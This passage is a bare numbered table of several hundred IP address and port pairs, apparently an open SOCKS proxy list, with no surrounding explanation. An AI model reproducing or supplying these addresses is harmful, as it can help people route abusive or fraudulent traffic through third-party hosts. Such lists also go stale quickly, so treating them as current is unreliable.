| 45.234.100.102:1080 1304 | 37.186.125.202:5678 1305 | 201.48.29.97:5678 1306 | 176.31.69.35:19598 1307 | 186.208.223.236:5678 1308 | 109.238.219.241:4153 1309 | 103.120.153.30:9999 1310 | 170.78.92.34:5678 1311 | 110.42.179.97:1081 1312 | 79.106.224.206:5678 1313 | 50.63.13.228:32959 1314 | 103.60.212.113:51754 1315 | 46.8.174.170:5678 1316 | 186.219.96.47:49923 1317 | 45.73.0.118:5678 1318 | 190.144.167.178:5678 1319 | 181.94.246.125:4153 1320 | 217.147.1.70:5678 1321 | 1.186.40.9:39651 1322 | 59.120.142.92:5678 1323 | 119.2.108.62:5678 1324 | 154.72.78.146:5678 1325 | 203.189.154.151:1080 1326 | 80.89.137.214:4145 1327 | 134.209.130.112:57012 1328 | 131.161.177.62:5678 1329 | 103.102.58.245:5678 1330 | 37.128.107.98:4145 1331 | 190.92.6.86:5678 1332 | 95.181.214.105:3629 1333 | 72.195.34.59:4145 1334 | 176.241.94.228:10801 1335 | 197.248.28.17:10801 1336 | 182.253.106.14:4145 1337 | 200.69.70.56:5678 1338 | 213.6.227.38:34081 1339 | 1.186.40.157:39651 1340 | 177.55.249.213:5678 1341 | 194.208.68.180:4153 1342 | 202.51.123.107:5678 1343 | 168.227.158.29:4145 1344 | 36.89.17.227:1080 1345 | 36.78.210.176:4145 1346 | 1.179.130.201:4153 1347 | 168.196.246.162:5678 1348 | 103.224.54.225:31433 1349 | 89.249.247.212:4145 1350 | 202.124.46.100:4145 1351 | 51.15.223.153:1080 1352 | 184.179.216.133:24630 1353 | 36.92.177.147:5678 1354 | 91.240.237.155:1080 1355 | 110.38.25.138:5678 1356 | 103.145.146.28:5678 1357 | 165.22.43.8:11070 1358 | 103.255.53.98:55165 1359 | 36.92.96.178:5678 1360 | 178.134.155.82:49483 1361 | 200.61.26.89:5678 1362 | 117.102.82.43:4145 1363 | 103.245.78.69:5678 1364 | 103.214.80.10:4153 1365 | 186.219.212.252:5678 1366 | 59.152.104.138:32075 1367 | 46.240.132.22:4153 1368 | 103.82.8.193:4153 1369 | 114.242.116.56:4145 1370 | 115.85.74.114:5678 1371 | 98.162.96.41:4145 1372 | 150.129.170.13:44502 1373 | 134.209.43.115:54697 1374 | 69.61.200.104:36181 1375 | 154.79.244.38:10801 1376 | 177.54.228.147:5678 1377 | 103.85.67.94:4145 1378 | 50.242.100.89:32100 1379 | 91.123.219.19:5678 1380 | 37.252.66.240:5678 1381 | 79.106.165.238:39983 1382 | 187.19.150.221:80 1383 | 216.218.15.48:35703 1384 | 109.86.244.225:57649 1385 | 98.162.25.29:31679 1386 | 36.92.78.125:5678 1387 | 121.134.198.156:4145 1388 | 103.47.93.229:1080 1389 | 103.85.103.13:5678 1390 | 186.225.250.26:53084 1391 | 188.163.170.130:35578 1392 | 177.85.172.135:4153 1393 | 201.131.214.110:5678 1394 | 192.99.7.189:50455 1395 | 103.87.81.86:5678 1396 | 192.141.236.4:5678 1397 | 14.142.20.134:4145 1398 | 110.34.5.123:5678 1399 | 103.140.244.229:4153 1400 | 202.91.186.65:4145 1401 | 185.51.92.84:51327 1402 | 46.160.230.220:5678 1403 | 192.241.167.22:19197 1404 | 45.249.79.190:3629 1405 | 202.43.182.3:4153 1406 | 98.162.25.23:4145 1407 | 103.235.199.46:5678 1408 | 120.50.13.38:40308 1409 | 5.181.195.89:82 1410 | 94.136.157.85:60030 1411 | 72.221.164.34:60671 1412 | 81.12.157.98:5678 1413 | 88.151.251.195:5678 1414 | 103.84.175.65:4153 1415 | 50.47.75.211:5678 1416 | 93.171.224.54:4153 1417 | 36.255.211.1:55438 1418 | 103.85.103.129:5678 1419 | 117.103.5.134:60113 1420 | 190.103.28.153:4145 1421 | 189.91.84.25:43907 1422 | 209.97.135.64:17711 1423 | 165.227.119.98:41478 1424 | 119.235.54.138:5678 1425 | 46.63.81.195:4145 1426 | 213.32.253.117:52396 1427 | 103.58.16.141:4145 1428 | 78.131.55.38:5678 1429 | 122.53.82.126:4145 1430 | 103.115.255.93:51372 1431 | 213.6.33.110:4145 1432 | 27.74.243.242:5678 1433 | 8.218.83.23:51287 1434 | 89.171.116.65:65000 1435 | 141.138.182.195:5678 1436 | 192.140.254.155:5678 1437 | 189.201.191.21:4145 1438 | 111.67.75.114:4145 1439 | 187.60.66.45:5678 1440 | 62.244.227.65:4153 1441 | 192.99.247.190:4145 1442 | 201.131.214.70:5678 1443 | 181.5.245.81:1080 1444 | 168.227.144.194:5678 1445 | 154.212.5.190:5678 1446 | 187.62.88.15:4153 1447 | 190.99.73.89:5678 1448 | 103.52.252.48:5678 1449 | 177.36.6.95:5678 1450 | 103.68.35.162:4145 1451 | 202.59.173.204:1080 1452 | 37.61.149.255:5678 1453 | 186.226.151.108:4145 1454 | 103.72.100.230:5678 1455 | 202.131.246.250:5678 1456 | 189.113.75.9:5678 1457 | 187.49.193.202:5678 1458 | 186.147.254.122:5678 1459 | 86.111.144.10:4145 1460 | 14.102.73.254:4145 1461 | 80.254.50.71:3629 1462 | 197.211.244.112:5678 1463 | 45.115.39.18:15584 1464 | 103.76.24.29:5678 1465 | 103.70.159.132:5678 1466 | 190.182.88.214:30956 1467 | 202.162.37.186:5678 1468 | 200.241.228.226:4153 1469 | 86.57.181.122:51801 1470 | 45.201.134.130:5678 1471 | 192.252.211.197:14921 1472 | 190.221.152.130:56142 1473 | 178.156.62.181:5678 1474 | 72.221.196.145:4145 1475 | 202.4.107.69:5678 1476 | 185.66.57.140:42647 1477 | 125.254.65.130:4145 1478 | 117.79.80.94:4145 1479 | 1.179.151.165:31948 1480 | 152.171.101.103:5678 1481 | 36.67.205.197:5678 1482 | 221.5.11.110:33020 1483 | 176.36.20.67:35356 1484 | 82.156.109.91:1080 1485 | 27.147.241.134:10800 1486 | 103.145.35.30:5678 1487 | 103.83.36.1:5678 1488 | 118.137.94.153:5678 1489 | 103.126.87.234:1080 1490 | 190.115.255.106:5678 1491 | 109.160.97.49:4145 1492 | 144.76.84.38:29355 1493 | 177.19.228.165:4153 1494 | 43.228.112.30:5678 1495 | 45.7.176.238:52246 1496 | 103.25.195.122:5678 1497 | 190.123.90.243:4153 1498 | 118.172.47.97:51327 1499 | 46.141.57.117:1080 1500 | 103.144.43.50:10801 1501 | 192.241.252.114:48658 1502 | 103.251.83.14:44550 1503 | 49.156.152.6:5678 1504 | 186.1.182.194:4153 1505 | 190.93.221.93:5678 1506 | 176.235.99.13:5678 1507 | 62.175.182.156:5678 1508 | 96.9.66.200:4153 1509 | 14.207.25.2:5678 1510 | 198.199.86.148:28386 1511 | 103.144.161.69:8291 1512 | 181.15.154.156:52033 1513 | 203.215.181.220:36342 1514 | 154.159.247.82:5678 1515 | 36.37.107.210:4153 1516 | 103.166.38.1:3629 1517 | 121.13.229.213:61401 1518 | 103.239.254.154:4153 1519 | 103.137.124.19:55492 1520 | 62.4.51.9:5678 1521 | 198.27.67.187:58577 1522 | 181.168.69.100:3629 1523 | 41.86.251.99:5678 1524 | 186.113.30.22:61618 1525 | 109.111.237.38:4145 1526 | 103.156.147.15:5678 1527 | 78.108.164.70:4153 1528 | 27.147.221.140:5678 1529 | 117.245.139.5:5678 1530 | 113.53.247.221:4153 1531 | 117.102.119.150:32302 1532 | 46.225.225.194:4145 1533 | 146.59.178.46:9300 1534 | 103.122.154.2:4145 1535 | 78.130.211.102:3629 1536 | 202.153.91.165:1080 1537 | 77.89.204.254:4145 1538 | 41.242.66.74:5678 1539 | 119.57.115.55:30622 1540 | 72.210.208.101:4145 1541 | 14.241.182.44:5678 1542 | 181.114.12.115:8888 1543 | 31.11.172.54:4153 1544 | 103.102.15.165:1080 1545 | 185.97.122.253:4153 1546 | 36.90.60.53:5678 1547 | 185.195.129.15:4153 1548 | 183.88.219.206:34676 1549 | 36.95.154.43:5678 1550 | 124.93.201.59:31917 1551 | 59.91.122.1:46726 1552 | 65.182.243.183:5678 1553 | 103.12.177.34:4145 1554 | 181.114.171.28:5678 1555 | 170.78.92.38:5678 1556 | 185.82.238.203:5678 1557 | 188.255.235.9:1080 1558 | 125.141.139.198:5566 1559 | 103.53.110.130:5678 1560 | 67.209.249.122:1080 1561 | 80.92.206.86:9300 1562 | 36.67.27.189:49524 1563 | 41.60.220.34:4145 1564 | 107.173.222.196:53690 1565 | 36.95.154.11:5678 1566 | 103.217.73.65:3629 1567 | 159.192.85.112:4145 1568 | 85.117.62.202:61885 1569 | 152.204.128.46:35483 1570 | 110.77.232.49:4145 1571 | 181.129.83.234:5678 1572 | 181.143.45.19:4153 1573 | 197.159.195.188:5678 1574 | 177.73.250.193:55226 1575 | 82.207.20.247:5678 1576 | 200.127.103.100:5678 1577 | 119.92.71.123:5678 1578 | 201.33.161.235:4153 1579 | 110.77.145.159:4145 1580 | 125.26.4.197:4145 1581 | 93.91.146.30:34350 1582 | 171.224.240.3:5678 1583 | 177.93.77.10:4153 1584 | 50.84.203.108:5678 1585 | 103.148.195.35:4153 1586 | 201.62.56.49:42317 1587 | 103.84.39.102:30740 1588 | 62.182.114.164:59623 1589 | 103.105.40.65:4145 1590 | 202.51.123.108:5678 1591 | 187.95.136.46:5678 1592 | 41.77.23.120:5678 1593 | 103.96.13.48:5678 1594 | 46.99.135.154:4153 1595 | 218.21.78.35:4145 1596 | 103.59.190.2:56252 1597 | 158.58.133.187:54266 1598 | 186.4.125.7:5678 1599 | 45.185.236.9:5678 1600 | 113.74.26.115:4145 1601 | 190.210.3.211:1080 1602 | 36.94.196.163:5678 1603 | 123.200.22.234:4153 1604 | 220.168.52.245:43717 1605 | 175.100.47.191:5678 1606 | 185.43.189.197:5678 1607 | 89.249.222.218:5678 1608 | 177.184.67.1:4145 1609 | 177.105.68.63:4153 1610 | 72.206.181.105:64935 1611 | 190.239.24.2:5678 1612 | 115.75.99.65:4153 1613 | 14.224.172.179:5678 1614 | 103.239.165.28:5678 1615 | 200.212.2.125:61283 1616 | 103.117.108.106:36932 1617 | 168.196.213.113:51372 1618 | 168.90.15.78:1080 1619 | 45.7.56.199:4153 1620 | 177.86.64.145:3629 1621 | 94.240.25.87:5678 1622 | 120.88.35.8:5678 1623 | 185.161.39.17:5678 1624 | 81.12.97.119:5678 1625 | 103.122.64.228:1080 1626 | 177.184.184.4:1088 1627 | 103.211.8.129:52616 1628 | 197.211.24.206:5678 1629 | 103.211.8.169:52616 1630 | 187.115.24.93:5678 1631 | 210.56.245.94:4145 1632 | 103.199.156.41:41610 1633 | 91.224.70.51:4153 1634 | 103.53.110.45:10801 1635 | 103.199.157.65:41610 1636 | 191.6.133.22:4145 1637 | 143.0.75.229:5678 1638 | 41.163.7.46:5678 1639 | 103.145.45.254:51372 1640 | 45.226.49.15:4153 1641 | 45.227.115.181:5678 1642 | 82.129.41.83:5678 1643 | 102.68.73.219:5678 1644 | 178.158.197.147:3629 1645 | 89.216.52.217:4153 1646 | 103.122.85.5:5678 1647 | 85.116.137.30:5678 1648 | 222.129.38.44:57114 1649 | 201.87.103.127:5678 1650 | 103.12.246.89:4145 1651 | 202.52.59.22:5678 1652 | 103.79.96.217:4153 1653 | 170.80.33.103:5678 1654 | 103.255.240.72:4153 1655 | 160.238.167.197:5678 1656 | 103.84.173.1:4153 1657 | 124.105.29.181:13629 1658 | 95.142.223.24:52666 1659 | 222.129.37.79:57114 1660 | 103.47.57.233:5678 1661 | 185.204.85.22:4153 1662 | 202.146.2.131:46698 1663 | 103.53.112.124:5678 1664 | 103.68.43.92:5678 1665 | 66.118.198.247:54321 1666 | 222.129.39.92:57114 1667 | 177.38.5.165:4153 1668 | 89.133.142.209:4145 1669 | 45.7.210.197:4153 1670 | 85.133.143.35:4145 1671 | 191.6.135.94:4145 1672 | 195.34.242.131:4145 1673 | 163.53.209.8:6667 1674 | 105.234.156.237:5678 1675 | 103.50.170.217:4145 1676 | 103.106.219.14:5678 1677 | 200.218.247.245:5678 1678 | 185.186.17.57:5678 1679 | 103.144.94.78:3629 1680 | 217.169.219.198:4153 1681 | 94.232.125.200:5678 1682 | 175.111.119.42:58033 1683 | 176.102.51.82:5678 1684 | 162.255.108.249:5678 1685 | 190.217.58.90:5678 1686 | 213.135.12.27:5678 1687 | 168.232.41.148:5678 1688 | 189.57.119.114:5678 1689 | 177.22.111.246:4145 1690 | 193.151.197.122:3629 1691 | 178.115.234.58:5678 1692 | 175.106.17.62:49238 1693 | 200.85.137.212:4153 1694 | 103.12.150.14:37983 1695 | 200.106.203.132:5678 1696 | 209.52.84.136:5678 1697 | 102.134.154.245:44550 1698 | 95.174.109.72:3629 1699 | 103.122.64.229:1080 1700 | 93.184.151.48:5678 1701 | 206.84.99.205:5678 1702 | 77.28.97.34:40082 1703 | 103.127.63.57:5678 1704 | 123.231.141.61:5678 1705 | 202.150.164.146:5678 1706 | 185.98.1.58:4153 1707 | 185.252.41.32:5678 1708 | 103.23.101.193:4145 1709 | 195.187.156.2:3629 1710 | 197.156.101.253:5678 1711 | 185.49.107.43:5678 1712 | 93.175.194.155:3629 1713 | 103.220.206.53:5678 1714 | 222.129.32.211:57114 1715 | 102.36.209.185:5678 1716 | 201.148.127.57:4145 1717 | 5.190.57.3:4153 1718 | 186.235.82.149:5678 1719 | 181.41.237.93:4153 1720 | 190.145.255.246:4145 1721 | 177.38.245.110:55713 1722 | 78.155.85.67:4153 1723 | 117.54.226.170:4153 1724 | 103.169.130.26:5678 1725 | 114.69.243.89:4145 1726 | 91.185.236.236:4145 1727 | 115.127.23.165:35294 1728 | 94.240.24.91:5678 1729 | 2.135.223.134:5678 1730 | 170.247.112.171:53900 1731 | 176.236.30.153:5678 1732 | 118.99.76.24:5678 1733 | 88.247.138.7:45534 1734 | 102.176.180.62:4153 1735 | 177.136.124.48:3629 1736 | 217.113.30.12:4153 1737 | 177.84.143.78:4153 1738 | 185.178.220.126:32000 1739 | 31.7.243.190:1080 1740 | 117.222.59.192:5678 1741 | 210.117.14.151:5003 1742 | 1.0.132.249:4153 1743 | 103.15.242.213:55492 1744 | 119.93.53.35:5678 1745 | 91.204.186.56:30134 1746 | 185.177.0.157:5678 1747 | 222.129.39.144:57114 1748 | 190.109.72.228:33633 1749 | 175.42.93.182:4145 1750 | 93.170.15.177:43261 1751 | 181.111.247.3:4153 1752 | 45.232.249.62:4145 1753 | 14.232.164.94:5678 1754 | 203.190.8.169:5678 1755 | 136.228.128.101:4153 1756 | 202.56.164.174:5678 1757 | 81.24.82.69:40980 1758 | 103.101.134.93:5678 1759 | 103.75.148.103:4145 1760 | 103.104.186.28:5678 1761 | 91.224.197.180:5678 1762 | 43.225.187.210:4153 1763 | 88.216.116.132:4153 1764 | 194.152.134.35:5678 1765 | 186.211.187.50:4153 1766 | 31.43.33.56:4153 1767 | 193.200.151.69:32777 1768 | 177.155.215.85:5678 1769 | 138.117.97.158:3629 1770 | 200.0.247.242:5678 1771 | 222.129.32.31:57114 1772 | 179.60.243.38:48699 1773 | --------------------------------------------------------------------------------